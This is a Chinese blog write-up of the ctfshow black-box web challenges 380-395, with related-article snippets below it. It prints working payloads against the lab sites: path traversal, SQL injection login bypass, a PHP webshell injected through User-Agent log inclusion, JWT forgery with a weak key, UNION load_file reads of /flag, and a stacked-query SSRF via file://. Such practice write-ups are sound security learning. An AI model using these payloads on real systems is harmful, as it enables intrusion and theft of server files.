ctfshow 黑盒测试web380-395 wp

最新推荐文章于 2023-08-09 15:28:08 发布
最新推荐文章于 2023-08-09 15:28:08 发布
阅读量375 收藏 1
点赞数
分类专栏: CTFSHOW 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50936156/article/details/124223555
版权

目录


记录下学习内容,题目地址: ctfshow,黑盒测试,信息收集真滴重要

web 380

开启题目,一个小型网站,四处浏览,没半点头绪,后来想到了目录扫描,结果线程最大为5否则504,看其他师傅的wp
有一个page.php页面

打开$id.php失败

猜到是file_get_contents,id传入page,出现关键部分

$html = file_get_contents('page_'.$id.'.php');
	echo $html;

再传入flag,出现flag

web 381

一样打开page.php,变成了

打开page_$id.php失败

直接用…/…/来返回目录查看1/../../../../var/www/html/page,虽然成功了,但没有flag页面,烦躁;找找找,突然看到了index.php源码上有个奇怪的地址

  <link rel="stylesheet" href="alsckdfy/layui/css/tree.css">

打开,/alsckdfy,出现flag

web 381,382

一样打开,/alsckdfy,出现登入页面,直接1’ and 1=1# 注入,出现flag

web 383-386

应该是非预期,跳了挺多东西的,预期可以看看其他师傅的
题目提醒密码前2位是小写字母,后三位是数字,猜估计是爆破,看了看还是5线程,麻了;等爆破的时候,突然看到发送给check.php,想到前面不是有file_get_contents读取么
直接访问page?id=1/../../../../var/www/html/alsckdfy/check出现flag

web 387

好了,page页面没用了,题目提示和web386一样,查看下386的check.php源码,注入不了;再次扫目录,发现clear.php,install,robots.txt;robots.txt有个debug页面,进去发现文件读取,尝试读取/var/www/html/alsckdfy/check.php,回显error;猜测debug页面是运行完文件,在返回回显值;直接日志访问··,运行webshell,放到User-Agent中;打算上传webshell,发现无法传参,直接读取

payload:<?php @eval(system('cat /var/www/html/alsckdfy/check.php'));?>

web 388

打开debug,发现文件无法读取,但还是能运行的,运行日志,将check.php写入文件中,再读取

<?php system('cat /var/www/html/alsckdfy/check.php > /var/www/html/1.txt')?>

web 389

打开debug,发现权限不足,抓包,发现cookie有个auth值,base64解码发现{ "alg": "HS256", "typ": "JWT" },打开jwt在线编码,解码发现密钥为123456,将user改为admin,编码传参,获得权限,同上一样

web 390

jwt签名换了,再到处找找;发现page页面用id来请求页面,试试sql注入,测试了几组数据猜测sql语句为select *,*,* from * where id=$_GET['id'];直接读取文件

payload: ?id=0 union 1,1,substr((select load_file('/var/www/html/alsckdfy/check.php')),1,255)#

web 391,392

测试了下id,发现有了waf,猜测waf是将数组过滤,将前几个为数字的放入id,其他的过滤;继续四处看看;点开一文章,发现搜索框去search.php。开始测试,存在sql注入。奇怪的是'--,#注释符不能共存,只能%23注释;估计是有过滤

payload: ?title=0' union select 1,1,substr((select load_file('/var/www/html/alsckdfy/check.php')),1,255)%23

下一题一样,就是flag放在/flag

payload: ?title=0' union select 1,1,substr((select load_file('/flag')),1,255)%23

web 393

没有思路,看了其他师傅的wp
这题是ssrf+sql的题;先sql注入查数据库,表

0' union select 1,1,schema_name from information_schema.schemata%23

0' union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow'%23

0' union select 1,1,group_concat(column_name) from information_schema.columns where table_name='content'%23

但查不了数据,但link表中为id,title,content
打开首页最下面,一个搜索引擎其利用查询link表中的数据来跳转页面,因此可以重写数据来实现ssrf

0';update link set url='file:///flag' %23

随便打开一个搜索引擎就行

web394,395

payload_1
存在过滤,16进制绕过,打开check.php

0';update link set url=0x66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870;#

payload_2
看了其他师傅的,还可以Redis攻击,将上面的16进制换掉就行,但url是int类型,最大为255,需要先改成text型,再写入

0';alter table link modify column url text;%23

利用gopherus工具获取payload,写入,得到shell

N0zer
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow__黑盒测试
qq_45655564的博客
07-04 398
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
ctfshow之黑盒测试380-395
qq_50589021的博客
09-15 746
前言 总结黑盒测试思路 可能用到的字典 xy123 admin888 /install/index.php /clear.php /page.php /alsckdfy/index.php /debug web380——测试URL参数 web381——找后台 web382、383——sql万能密码 web384——爆破 开始过滤 爆破 字典生成: import string s1=string.ascii_lowercase # 小写字母a-z s2=string.digits # 数字 f=op
CTFshow刷题日记-WEB-黑盒测试web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3009
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
ctf.show黑盒测试(web380-381)
wanan的博客
08-31 612
ctf.show黑盒测试(web380-381)
【CTFSHOW】web入门 黑盒测试
7ruth0hn的博客
09-29 1247
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学黑盒测试web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
黑盒测试的方法-PPT
09-26
黑盒测试的方法-PPT
黑盒测试方法----流程图.pdf
12-21
黑盒测试方法----流程图 黑盒测试方法是一种软件测试方法,它不关心软件的内部结构和工作机制,而是通过观察软件的输入和输出来测试其是否正确地工作。本文将详细介绍黑盒测试方法中的流程图,包括适用场景、覆盖...
黑盒测试-白盒测试-单元测试.7z
04-30
有需要的拿走
软件测试-9黑盒测试场景法PPT课件.ppt
11-16
软件测试-黑盒测试场景法PPT课件 黑盒测试场景法是一种基于事件触发的测试方法,通过场景法可以生动地描绘出事件触发时的情景,有利于设计测试用例,同时使测试用例更容易理解和执行。本文将详细介绍黑盒测试场景法...
黑盒测试:决策表法、因果图法.zip
06-19
黑盒测试的决策表法和因果图法,可以提供给正在学习软件测试的学弟学妹们借鉴和参考!
有关黑盒测试WEB测试的范例
02-06
它里面有一个黑盒测试WEB测试和测试文档,对新学测试的朋友有很好的帮助啊
CTFshow 黑盒测试
starttv的博客
12-03 565
简单的看了一下,没有发现可以交互的地方,先扫描一下目录吧 扫描出两个目录flag.php和page.php。先访问flag.php为空,查看源代码为空。访问page.php,出现报错,应该需要传一个id参数,访问对应的php文件。 Payload:右键查看源代码即可获得flag web381-源码找后台 界面跟上题差不多,先扫目录,还是page.php,不过没扫出来flag.php,上题的思路行不通。检查源代码发现一个奇怪的目录,alsckdfy,访问试试,得到flag。 web382-sql注入 按照上题
CTFshow——黑盒测试
D.MIND 的博客
08-14 627
文章目录380381382、383384385386387388389390391、392393394、395 380 扫描一个目录,发现page.php,打开发现提示缺少id参数,且id参数控制php文件的打开,直接/page.php?id=flag即可 381 在首页源码中有可疑的路径,一层层打开看就发现flag了 382、383 两题依旧是访问后台:/alsckdfy/,弹出一个登陆界面,在账号处有SQL注入,admin'||1#即可登入 最后还是弱密码爆破一下,账密是admin:admin888
ctfshow黑盒测试
qq_61768489的博客
01-28 584
在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面。与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过。link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url。这里可以利用ssrf可以添加跳转页面即url字段,比如添加。现在的目的应该是删除这个lock.dat然后重置密码。这里传入什么参数也是靠黑盒来猜了,用file参数。$id应该是传的参数,是php的文件名。search.php的注入点,跑不出。
ctfshow-web入门-黑盒测试web380-386)
i_kei的博客
01-11 1092
鸣谢 感谢ctfshow平台对本栏目的大力支持(皮一下很开心) web380 打开页面之后,分析了网页源码,翻了半天css,什么都没找到 后来经过太空人师傅提示page.php,打开看看 提示打开$id.php失败,构造page.php?id=flag,查看源码发现flag web381 看了一晚上源码,愣是没发现这个目录,我醉了 访问/alsckdfy/即可获得flag web382 继续打开后台 第一种解法: 万能密码登录 例: admin 'or ‘1’=‘1’# 登录即可拿到flag 第
黑盒测试可不只是点点点,也需要会用各种测试工具~
2301_78276982的博客
08-09 436
生命不息,奋斗不止。每一份努力都不会被辜负,只要坚持不懈,终究会有回报。珍惜时间,追求梦想。不忘初心,砥砺前行。你的未来,由你掌握!生命短暂,时间宝贵,我们无法预知未来会发生什么,但我们可以掌握当下。珍惜每一天,努力奋斗,让自己变得更加强大和优秀。坚定信念,执着追求,成功终将属于你!只有不断地挑战自己,才能不断地超越自己。坚持追求梦想,勇敢前行,你就会发现奋斗的过程是如此美好而值得。相信自己,你一定可以做到!
CTFSHOW黑盒测试
羽的博客
01-15 1789
文章目录web380web381web382、383web384web385web386web387388web389web390web391web392web393 web380 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag web381 payload 地址在源码里面 web382、383 还是上面的地址,万能密码登录得到flag web384 字典生成 import string s1=string.asci
ctfshow黑盒测试
最新发布
09-29
黑盒测试是一种测试方法,它是在没有访问内部...根据引用的信息,我们可以得出结论:ctfshow黑盒测试是一种针对系统安全进行的渗透测试,测试者试图绕过黑名单功能并执行一系列攻击操作,以测试系统的安全性和鲁棒性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值